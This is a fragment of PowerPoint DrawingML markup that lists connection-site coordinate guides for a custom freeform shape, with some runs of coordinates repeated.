              <a:gd name="connsiteY100" fmla="*/ 3769007 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 721407 w 1605470"/>
              <a:gd name="connsiteY101" fmla="*/ 3767709 h 6858000"/>
              <a:gd name="connsiteX102" fmla="*/ 730103 w 1605470"/>
              <a:gd name="connsiteY102" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX103" fmla="*/ 737449 w 1605470"/>
              <a:gd name="connsiteY103" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX104" fmla="*/ 736745 w 1605470"/>
              <a:gd name="connsiteY104" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX105" fmla="*/ 740188 w 1605470"/>
              <a:gd name="connsiteY105" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX106" fmla="*/ 747726 w 1605470"/>
              <a:gd name="connsiteY106" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX107" fmla="*/ 774383 w 1605470"/>
              <a:gd name="connsiteY107" fmla="*/ 3381564 h 6858000"/>
              <a:gd name="connsiteX108" fmla="*/ 774870 w 1605470"/>
              <a:gd name="connsiteY108" fmla="*/ 3375761 h 6858000"/>
              <a:gd name="connsiteX109" fmla="*/ 770510 w 1605470"/>
              <a:gd name="connsiteY109" fmla="*/ 3361844 h 6858000"/>
              <a:gd name="connsiteX110" fmla="*/ 767933 w 1605470"/>
              <a:gd name="connsiteY110" fmla="*/ 3356929 h 6858000"/>
              <a:gd name="connsiteX111" fmla="*/ 766158 w 1605470"/>
              <a:gd name="connsiteY111" fmla="*/ 3349058 h 6858000"/>
              <a:gd name="connsiteX112" fmla="*/ 766414 w 1605470"/>
              <a:gd name="connsiteY112" fmla="*/ 3348763 h 6858000"/>
              <a:gd name="connsiteX113" fmla="*/ 764166 w 1605470"/>
              <a:gd name="connsiteY113" fmla="*/ 3341588 h 6858000"/>
              <a:gd name="connsiteX114" fmla="*/ 749397 w 1605470"/>
              <a:gd name="connsiteY114" fmla="*/ 3307769 h 6858000"/>
              <a:gd name="connsiteX115" fmla="*/ 766960 w 1605470"/>
              <a:gd name="connsiteY115" fmla="*/ 3250522 h 6858000"/>
              <a:gd name="connsiteX116" fmla="*/ 767385 w 1605470"/>
              <a:gd name="connsiteY116" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX117" fmla="*/ 769208 w 1605470"/>
              <a:gd name="connsiteY117" fmla="*/ 3217217 h 6858000"/>
              <a:gd name="connsiteX118" fmla="*/ 770350 w 1605470"/>
              <a:gd name="connsiteY118" fmla="*/ 3216125 h 6858000"/>
              <a:gd name="connsiteX119" fmla="*/ 756043 w 1605470"/>
              <a:gd name="connsiteY119" fmla="*/ 3183755 h 6858000"/>
              <a:gd name="connsiteX120" fmla="*/ 756544 w 1605470"/>
              <a:gd name="connsiteY120" fmla="*/ 3178642 h 6858000"/>
              <a:gd name="connsiteX121" fmla="*/ 744144 w 1605470"/>
              <a:gd name="connsiteY121" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX122" fmla="*/ 739378 w 1605470"/>
              <a:gd name="connsiteY122" fmla="*/ 3147669 h 6858000"/>
              <a:gd name="connsiteX123" fmla="*/ 734648 w 1605470"/>
              <a:gd name="connsiteY123" fmla="*/ 3145733 h 6858000"/>
              <a:gd name="connsiteX124" fmla="*/ 729329 w 1605470"/>
              <a:gd name="connsiteY124" fmla="*/ 3129034 h 6858000"/>
              <a:gd name="connsiteX125" fmla="*/ 729994 w 1605470"/>
              <a:gd name="connsiteY125" fmla="*/ 3126682 h 6858000"/>
              <a:gd name="connsiteX126" fmla="*/ 720862 w 1605470"/>
              <a:gd name="connsiteY126" fmla="*/ 3114519 h 6858000"/>
              <a:gd name="connsiteX127" fmla="*/ 707471 w 1605470"/>
              <a:gd name="connsiteY127" fmla="*/ 3106272 h 6858000"/>
              <a:gd name="connsiteX128" fmla="*/ 680201 w 1605470"/>
              <a:gd name="connsiteY128" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX129" fmla="*/ 622815 w 1605470"/>
              <a:gd name="connsiteY129" fmla="*/ 2762989 h 6858000"/>
              <a:gd name="connsiteX130" fmla="*/ 571733 w 1605470"/>
              <a:gd name="connsiteY130" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX131" fmla="*/ 551827 w 1605470"/>
              <a:gd name="connsiteY131" fmla="*/ 2485734 h 6858000"/>
              <a:gd name="connsiteX132" fmla="*/ 542550 w 1605470"/>
              <a:gd name="connsiteY132" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX133" fmla="*/ 529511 w 1605470"/>
              <a:gd name="connsiteY133" fmla="*/ 2425819 h 6858000"/>
              <a:gd name="connsiteX134" fmla="*/ 528878 w 1605470"/>
              <a:gd name="connsiteY134" fmla="*/ 2408971 h 6858000"/>
              <a:gd name="connsiteX135" fmla="*/ 535510 w 1605470"/>
              <a:gd name="connsiteY135" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX136" fmla="*/ 538122 w 1605470"/>
              <a:gd name="connsiteY136" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX137" fmla="*/ 514451 w 1605470"/>
              <a:gd name="connsiteY137" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX138" fmla="*/ 486968 w 1605470"/>
              <a:gd name="connsiteY138" fmla="*/ 2182937 h 6858000"/>
              <a:gd name="connsiteX139" fmla="*/ 488555 w 1605470"/>
              <a:gd name="connsiteY139" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX140" fmla="*/ 486013 w 1605470"/>
              <a:gd name="connsiteY140" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX141" fmla="*/ 487006 w 1605470"/>
              <a:gd name="connsiteY141" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX142" fmla="*/ 478812 w 1605470"/>
              <a:gd name="connsiteY142" fmla="*/ 1963269 h 6858000"/>
              <a:gd name="connsiteX143" fmla="*/ 442619 w 1605470"/>
              <a:gd name="connsiteY143" fmla="*/ 1910499 h 6858000"/>
              <a:gd name="connsiteX144" fmla="*/ 446785 w 1605470"/>
              <a:gd name="connsiteY144" fmla="*/ 1903212 h 6858000"/>
              <a:gd name="connsiteX145" fmla="*/ 436547 w 1605470"/>
              <a:gd name="connsiteY145" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX146" fmla="*/ 390346 w 1605470"/>
              <a:gd name="connsiteY146" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX147" fmla="*/ 362657 w 1605470"/>
              <a:gd name="connsiteY147" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX148" fmla="*/ 361783 w 1605470"/>
              <a:gd name="connsiteY148" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX149" fmla="*/ 342578 w 1605470"/>
              <a:gd name="connsiteY149" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX150" fmla="*/ 355658 w 1605470"/>
              <a:gd name="connsiteY150" fmla="*/ 1519474 h 6858000"/>
              <a:gd name="connsiteX151" fmla="*/ 348400 w 1605470"/>
              <a:gd name="connsiteY151" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX152" fmla="*/ 334485 w 1605470"/>
              <a:gd name="connsiteY152" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX153" fmla="*/ 342792 w 1605470"/>
              <a:gd name="connsiteY153" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX154" fmla="*/ 343980 w 1605470"/>
              <a:gd name="connsiteY154" fmla="*/ 1189033 h 6858000"/>
              <a:gd name="connsiteX155" fmla="*/ 348665 w 1605470"/>
              <a:gd name="connsiteY155" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX156" fmla="*/ 340947 w 1605470"/>
              <a:gd name="connsiteY156" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX157" fmla="*/ 330253 w 1605470"/>
              <a:gd name="connsiteY157" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX158" fmla="*/ 318989 w 1605470"/>
              <a:gd name="connsiteY158" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX159" fmla="*/ 320445 w 1605470"/>
              <a:gd name="connsiteY159" fmla="*/ 932283 h 6858000"/>
              <a:gd name="connsiteX160" fmla="*/ 322681 w 1605470"/>
              <a:gd name="connsiteY160" fmla="*/ 915925 h 6858000"/>
              <a:gd name="connsiteX161" fmla="*/ 315310 w 1605470"/>
              <a:gd name="connsiteY161" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX162" fmla="*/ 284718 w 1605470"/>
              <a:gd name="connsiteY162" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX163" fmla="*/ 263668 w 1605470"/>
              <a:gd name="connsiteY163" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX164" fmla="*/ 263226 w 1605470"/>
              <a:gd name="connsiteY164" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX165" fmla="*/ 248897 w 1605470"/>
              <a:gd name="connsiteY165" fmla="*/ 681659 h 6858000"/>
              <a:gd name="connsiteX166" fmla="*/ 234316 w 1605470"/>
              <a:gd name="connsiteY166" fmla="*/ 635218 h 6858000"/>
              <a:gd name="connsiteX167" fmla="*/ 239327 w 1605470"/>
              <a:gd name="connsiteY167" fmla="*/ 613763 h 6858000"/>
              <a:gd name="connsiteX168" fmla="*/ 225269 w 1605470"/>
              <a:gd name="connsiteY168" fmla="*/ 598582 h 6858000"/>
              <a:gd name="connsiteX169" fmla="*/ 224950 w 1605470"/>
              <a:gd name="connsiteY169" fmla="*/ 576846 h 6858000"/>
              <a:gd name="connsiteX170" fmla="*/ 204576 w 1605470"/>
              <a:gd name="connsiteY170" fmla="*/ 530055 h 6858000"/>
              <a:gd name="connsiteX171" fmla="*/ 219064 w 1605470"/>
              <a:gd name="connsiteY171" fmla="*/ 469651 h 6858000"/>
              <a:gd name="connsiteX172" fmla="*/ 195012 w 1605470"/>
              <a:gd name="connsiteY172" fmla="*/ 448559 h 6858000"/>
              <a:gd name="connsiteX173" fmla="*/ 201434 w 1605470"/>
              <a:gd name="connsiteY173" fmla="*/ 441529 h 6858000"/>
              <a:gd name="connsiteX174" fmla="*/ 200655 w 1605470"/>
              <a:gd name="connsiteY174" fmla="*/ 428927 h 6858000"/>
              <a:gd name="connsiteX175" fmla="*/ 190059 w 1605470"/>
              <a:gd name="connsiteY175" fmla="*/ 430161 h 6858000"/>
              <a:gd name="connsiteX176" fmla="*/ 167079 w 1605470"/>
              <a:gd name="connsiteY176" fmla="*/ 367211 h 6858000"/>
              <a:gd name="connsiteX177" fmla="*/ 124571 w 1605470"/>
              <a:gd name="connsiteY177" fmla="*/ 302178 h 6858000"/>
              <a:gd name="connsiteX178" fmla="*/ 103243 w 1605470"/>
              <a:gd name="connsiteY178" fmla="*/ 211375 h 6858000"/>
              <a:gd name="connsiteX179" fmla="*/ 94571 w 1605470"/>
              <a:gd name="connsiteY179" fmla="*/ 184179 h 6858000"/>
              <a:gd name="connsiteX180" fmla="*/ 13437 w 1605470"/>
              <a:gd name="connsiteY180" fmla="*/ 19287 h 6858000"/>
              <a:gd name="connsiteX181" fmla="*/ 0 w 1605470"/>
              <a:gd name="connsiteY18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13201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47700 w 1605470"/>
              <a:gd name="connsiteY75" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 743180 w 1605470"/>
              <a:gd name="connsiteY76" fmla="*/ 4613201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935 w 1605470"/>
              <a:gd name="connsiteY68" fmla="*/ 4821504 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 732118 w 1605470"/>
              <a:gd name="connsiteY69" fmla="*/ 4801535 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 739787 w 1605470"/>
              <a:gd name="connsiteY70" fmla="*/ 4797794 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 741081 w 1605470"/>
              <a:gd name="connsiteY71" fmla="*/ 4784526 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 742865 w 1605470"/>
              <a:gd name="connsiteY72" fmla="*/ 4781211 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 751652 w 1605470"/>
              <a:gd name="connsiteY73" fmla="*/ 4761984 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 747700 w 1605470"/>
              <a:gd name="connsiteY74" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 743180 w 1605470"/>
              <a:gd name="connsiteY75" fmla="*/ 4613201 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 738263 w 1605470"/>
              <a:gd name="connsiteY76" fmla="*/ 4444346 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 756542 w 1605470"/>
              <a:gd name="connsiteY77" fmla="*/ 4350346 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 715481 w 1605470"/>
              <a:gd name="connsiteY78" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 719554 w 1605470"/>
              <a:gd name="connsiteY79" fmla="*/ 4090296 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 704810 w 1605470"/>
              <a:gd name="connsiteY80" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 705959 w 1605470"/>
              <a:gd name="connsiteY81" fmla="*/ 4031933 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 704535 w 1605470"/>
              <a:gd name="connsiteY82" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 700443 w 1605470"/>
              <a:gd name="connsiteY83" fmla="*/ 4010511 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 698282 w 1605470"/>
              <a:gd name="connsiteY84" fmla="*/ 3998331 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 690830 w 1605470"/>
              <a:gd name="connsiteY85" fmla="*/ 3974753 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 692428 w 1605470"/>
              <a:gd name="connsiteY86" fmla="*/ 3969950 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 685850 w 1605470"/>
              <a:gd name="connsiteY87" fmla="*/ 3933779 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 687181 w 1605470"/>
              <a:gd name="connsiteY88" fmla="*/ 3933093 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 691535 w 1605470"/>
              <a:gd name="connsiteY89" fmla="*/ 3922082 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 696613 w 1605470"/>
              <a:gd name="connsiteY90" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 719207 w 1605470"/>
              <a:gd name="connsiteY91" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 718632 w 1605470"/>
              <a:gd name="connsiteY92" fmla="*/ 3806161 h 6858000"/>
              <a:gd name="connsiteX93" fmla="*/ 718939 w 1605470"/>
              <a:gd name="connsiteY93" fmla="*/ 3805957 h 6858000"/>
              <a:gd name="connsiteX94" fmla="*/ 718966 w 1605470"/>
              <a:gd name="connsiteY94" fmla="*/ 3797724 h 6858000"/>
              <a:gd name="connsiteX95" fmla="*/ 717581 w 1605470"/>
              <a:gd name="connsiteY95" fmla="*/ 3792098 h 6858000"/>
              <a:gd name="connsiteX96" fmla="*/ 716465 w 1605470"/>
              <a:gd name="connsiteY96" fmla="*/ 3777135 h 6858000"/>
              <a:gd name="connsiteX97" fmla="*/ 718198 w 1605470"/>
              <a:gd name="connsiteY97" fmla="*/ 3771656 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 721941 w 1605470"/>
              <a:gd name="connsiteY98" fmla="*/ 3769007 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 721407 w 1605470"/>
              <a:gd name="connsiteY99" fmla="*/ 3767709 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 730103 w 1605470"/>
              <a:gd name="connsiteY100" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 737449 w 1605470"/>
              <a:gd name="connsiteY101" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX102" fmla="*/ 736745 w 1605470"/>
              <a:gd name="connsiteY102" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX103" fmla="*/ 740188 w 1605470"/>
              <a:gd name="connsiteY103" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX104" fmla="*/ 747726 w 1605470"/>
              <a:gd name="connsiteY104" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX105" fmla="*/ 774383 w 1605470"/>
              <a:gd name="connsiteY105" fmla="*/ 3381564 h 6858000"/>
              <a:gd name="connsiteX106" fmla="*/ 774870 w 1605470"/>
              <a:gd name="connsiteY106" fmla="*/ 3375761 h 6858000"/>
              <a:gd name="connsiteX107" fmla="*/ 770510 w 1605470"/>
              <a:gd name="connsiteY107" fmla="*/ 3361844 h 6858000"/>
              <a:gd name="connsiteX108" fmla="*/ 767933 w 1605470"/>
              <a:gd name="connsiteY108" fmla="*/ 3356929 h 6858000"/>
              <a:gd name="connsiteX109" fmla="*/ 766158 w 1605470"/>
              <a:gd name="connsiteY109" fmla="*/ 3349058 h 6858000"/>
              <a:gd name="connsiteX110" fmla="*/ 766414 w 1605470"/>
              <a:gd name="connsiteY110" fmla="*/ 3348763 h 6858000"/>
              <a:gd name="connsiteX111" fmla="*/ 764166 w 1605470"/>
              <a:gd name="connsiteY111" fmla="*/ 3341588 h 6858000"/>
              <a:gd name="connsiteX112" fmla="*/ 749397 w 1605470"/>
              <a:gd name="connsiteY112" fmla="*/ 3307769 h 6858000"/>
              <a:gd name="connsiteX113" fmla="*/ 766960 w 1605470"/>
              <a:gd name="connsiteY113" fmla="*/ 3250522 h 6858000"/>
              <a:gd name="connsiteX114" fmla="*/ 767385 w 1605470"/>
              <a:gd name="connsiteY114" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX115" fmla="*/ 769208 w 1605470"/>
              <a:gd name="connsiteY115" fmla="*/ 3217217 h 6858000"/>
              <a:gd name="connsiteX116" fmla="*/ 770350 w 1605470"/>
              <a:gd name="connsiteY116" fmla="*/ 3216125 h 6858000"/>
              <a:gd name="connsiteX117" fmla="*/ 756043 w 1605470"/>
              <a:gd name="connsiteY117" fmla="*/ 3183755 h 6858000"/>
              <a:gd name="connsiteX118" fmla="*/ 756544 w 1605470"/>
              <a:gd name="connsiteY118" fmla="*/ 3178642 h 6858000"/>
              <a:gd name="connsiteX119" fmla="*/ 744144 w 1605470"/>
              <a:gd name="connsiteY119" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX120" fmla="*/ 739378 w 1605470"/>
              <a:gd name="connsiteY120" fmla="*/ 3147669 h 6858000"/>
              <a:gd name="connsiteX121" fmla="*/ 734648 w 1605470"/>
              <a:gd name="connsiteY121" fmla="*/ 3145733 h 6858000"/>
              <a:gd name="connsiteX122" fmla="*/ 729329 w 1605470"/>
              <a:gd name="connsiteY122" fmla="*/ 3129034 h 6858000"/>
              <a:gd name="connsiteX123" fmla="*/ 729994 w 1605470"/>
              <a:gd name="connsiteY123" fmla="*/ 3126682 h 6858000"/>
              <a:gd name="connsiteX124" fmla="*/ 720862 w 1605470"/>
              <a:gd name="connsiteY124" fmla="*/ 3114519 h 6858000"/>
              <a:gd name="connsiteX125" fmla="*/ 707471 w 1605470"/>
              <a:gd name="connsiteY125" fmla="*/ 3106272 h 6858000"/>
              <a:gd name="connsiteX126" fmla="*/ 680201 w 1605470"/>
              <a:gd name="connsiteY126" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX127" fmla="*/ 622815 w 1605470"/>
              <a:gd name="connsiteY127" fmla="*/ 2762989 h 6858000"/>
              <a:gd name="connsiteX128" fmla="*/ 571733 w 1605470"/>
              <a:gd name="connsiteY128" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX129" fmla="*/ 551827 w 1605470"/>
              <a:gd name="connsiteY129" fmla="*/ 2485734 h 6858000"/>
              <a:gd name="connsiteX130" fmla="*/ 542550 w 1605470"/>
              <a:gd name="connsiteY130" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX131" fmla="*/ 529511 w 1605470"/>
              <a:gd name="connsiteY131" fmla="*/ 2425819 h 6858000"/>
              <a:gd name="connsiteX132" fmla="*/ 528878 w 1605470"/>
              <a:gd name="connsiteY132" fmla="*/ 2408971 h 6858000"/>
              <a:gd name="connsiteX133" fmla="*/ 535510 w 1605470"/>
              <a:gd name="connsiteY133" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX134" fmla="*/ 538122 w 1605470"/>
              <a:gd name="connsiteY134" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX135" fmla="*/ 514451 w 1605470"/>
              <a:gd name="connsiteY135" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX136" fmla="*/ 486968 w 1605470"/>
              <a:gd name="connsiteY136" fmla="*/ 2182937 h 6858000"/>
              <a:gd name="connsiteX137" fmla="*/ 488555 w 1605470"/>
              <a:gd name="connsiteY137" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX138" fmla="*/ 486013 w 1605470"/>
              <a:gd name="connsiteY138" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX139" fmla="*/ 487006 w 1605470"/>
              <a:gd name="connsiteY139" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX140" fmla="*/ 478812 w 1605470"/>
              <a:gd name="connsiteY140" fmla="*/ 1963269 h 6858000"/>
              <a:gd name="connsiteX141" fmla="*/ 442619 w 1605470"/>
              <a:gd name="connsiteY141" fmla="*/ 1910499 h 6858000"/>
              <a:gd name="connsiteX142" fmla="*/ 446785 w 1605470"/>
              <a:gd name="connsiteY142" fmla="*/ 1903212 h 6858000"/>
              <a:gd name="connsiteX143" fmla="*/ 436547 w 1605470"/>
              <a:gd name="connsiteY143" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX144" fmla="*/ 390346 w 1605470"/>
              <a:gd name="connsiteY144" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX145" fmla="*/ 362657 w 1605470"/>
              <a:gd name="connsiteY145" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX146" fmla="*/ 361783 w 1605470"/>
              <a:gd name="connsiteY146" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX147" fmla="*/ 342578 w 1605470"/>
              <a:gd name="connsiteY147" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX148" fmla="*/ 355658 w 1605470"/>
              <a:gd name="connsiteY148" fmla="*/ 1519474 h 6858000"/>
              <a:gd name="connsiteX149" fmla="*/ 348400 w 1605470"/>
              <a:gd name="connsiteY149" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX150" fmla="*/ 334485 w 1605470"/>
              <a:gd name="connsiteY150" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX151" fmla="*/ 342792 w 1605470"/>
              <a:gd name="connsiteY151" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX152" fmla="*/ 343980 w 1605470"/>
              <a:gd name="connsiteY152" fmla="*/ 1189033 h 6858000"/>
              <a:gd name="connsiteX153" fmla="*/ 348665 w 1605470"/>
              <a:gd name="connsiteY153" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX154" fmla="*/ 340947 w 1605470"/>
              <a:gd name="connsiteY154" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX155" fmla="*/ 330253 w 1605470"/>
              <a:gd name="connsiteY155" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX156" fmla="*/ 318989 w 1605470"/>
              <a:gd name="connsiteY156" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX157" fmla="*/ 320445 w 1605470"/>
              <a:gd name="connsiteY157" fmla="*/ 932283 h 6858000"/>
              <a:gd name="connsiteX158" fmla="*/ 322681 w 1605470"/>
              <a:gd name="connsiteY158" fmla="*/ 915925 h 6858000"/>
              <a:gd name="connsiteX159" fmla="*/ 315310 w 1605470"/>
              <a:gd name="connsiteY159" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX160" fmla="*/ 284718 w 1605470"/>
              <a:gd name="connsiteY160" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX161" fmla="*/ 263668 w 1605470"/>
              <a:gd name="connsiteY161" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX162" fmla="*/ 263226 w 1605470"/>
              <a:gd name="connsiteY162" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX163" fmla="*/ 248897 w 1605470"/>
              <a:gd name="connsiteY163" fmla="*/ 681659 h 6858000"/>
              <a:gd name="connsiteX164" fmla="*/ 234316 w 1605470"/>
              <a:gd name="connsiteY164" fmla="*/ 635218 h 6858000"/>
              <a:gd name="connsiteX165" fmla="*/ 239327 w 1605470"/>
              <a:gd name="connsiteY165" fmla="*/ 613763 h 6858000"/>
              <a:gd name="connsiteX166" fmla="*/ 225269 w 1605470"/>
              <a:gd name="connsiteY166" fmla="*/ 598582 h 6858000"/>
              <a:gd name="connsiteX167" fmla="*/ 224950 w 1605470"/>
              <a:gd name="connsiteY167" fmla="*/ 576846 h 6858000"/>
              <a:gd name="connsiteX168" fmla="*/ 204576 w 1605470"/>
              <a:gd name="connsiteY168" fmla="*/ 530055 h 6858000"/>
              <a:gd name="connsiteX169" fmla="*/ 219064 w 1605470"/>
              <a:gd name="connsiteY169" fmla="*/ 469651 h 6858000"/>
              <a:gd name="connsiteX170" fmla="*/ 195012 w 1605470"/>
              <a:gd name="connsiteY170" fmla="*/ 448559 h 6858000"/>
              <a:gd name="connsiteX171" fmla="*/ 201434 w 1605470"/>
              <a:gd name="connsiteY171" fmla="*/ 441529 h 6858000"/>
              <a:gd name="connsiteX172" fmla="*/ 200655 w 1605470"/>
              <a:gd name="connsiteY172" fmla="*/ 428927 h 6858000"/>
              <a:gd name="connsiteX173" fmla="*/ 190059 w 1605470"/>
              <a:gd name="connsiteY173" fmla="*/ 430161 h 6858000"/>
              <a:gd name="connsiteX174" fmla="*/ 167079 w 1605470"/>
              <a:gd name="connsiteY174" fmla="*/ 367211 h 6858000"/>
              <a:gd name="connsiteX175" fmla="*/ 124571 w 1605470"/>
              <a:gd name="connsiteY175" fmla="*/ 302178 h 6858000"/>
              <a:gd name="connsiteX176" fmla="*/ 103243 w 1605470"/>
              <a:gd name="connsiteY176" fmla="*/ 211375 h 6858000"/>
              <a:gd name="connsiteX177" fmla="*/ 94571 w 1605470"/>
              <a:gd name="connsiteY177" fmla="*/ 184179 h 6858000"/>
              <a:gd name="connsiteX178" fmla="*/ 13437 w 1605470"/>
              <a:gd name="connsiteY178" fmla="*/ 19287 h 6858000"/>
              <a:gd name="connsiteX179" fmla="*/ 0 w 1605470"/>
              <a:gd name="connsiteY17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31653 w 1605470"/>
              <a:gd name="connsiteY39" fmla="*/ 5604904 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 539863 w 1605470"/>
              <a:gd name="connsiteY40" fmla="*/ 5604298 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 552319 w 1605470"/>
              <a:gd name="connsiteY41" fmla="*/ 5587997 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 559710 w 1605470"/>
              <a:gd name="connsiteY42" fmla="*/ 5564796 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 587214 w 1605470"/>
              <a:gd name="connsiteY43" fmla="*/ 5451511 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 608019 w 1605470"/>
              <a:gd name="connsiteY44" fmla="*/ 5385461 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 622750 w 1605470"/>
              <a:gd name="connsiteY45" fmla="*/ 5363084 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 638731 w 1605470"/>
              <a:gd name="connsiteY46" fmla="*/ 5330009 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 672224 w 1605470"/>
              <a:gd name="connsiteY47" fmla="*/ 5273739 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 681823 w 1605470"/>
              <a:gd name="connsiteY48" fmla="*/ 5241779 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 693049 w 1605470"/>
              <a:gd name="connsiteY49" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 694069 w 1605470"/>
              <a:gd name="connsiteY50" fmla="*/ 5217684 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 701410 w 1605470"/>
              <a:gd name="connsiteY51" fmla="*/ 5193377 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 704713 w 1605470"/>
              <a:gd name="connsiteY52" fmla="*/ 5179288 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 705697 w 1605470"/>
              <a:gd name="connsiteY53" fmla="*/ 5173621 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 701331 w 1605470"/>
              <a:gd name="connsiteY54" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 708008 w 1605470"/>
              <a:gd name="connsiteY55" fmla="*/ 5144295 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 704941 w 1605470"/>
              <a:gd name="connsiteY56" fmla="*/ 5125185 h 6858000"/>
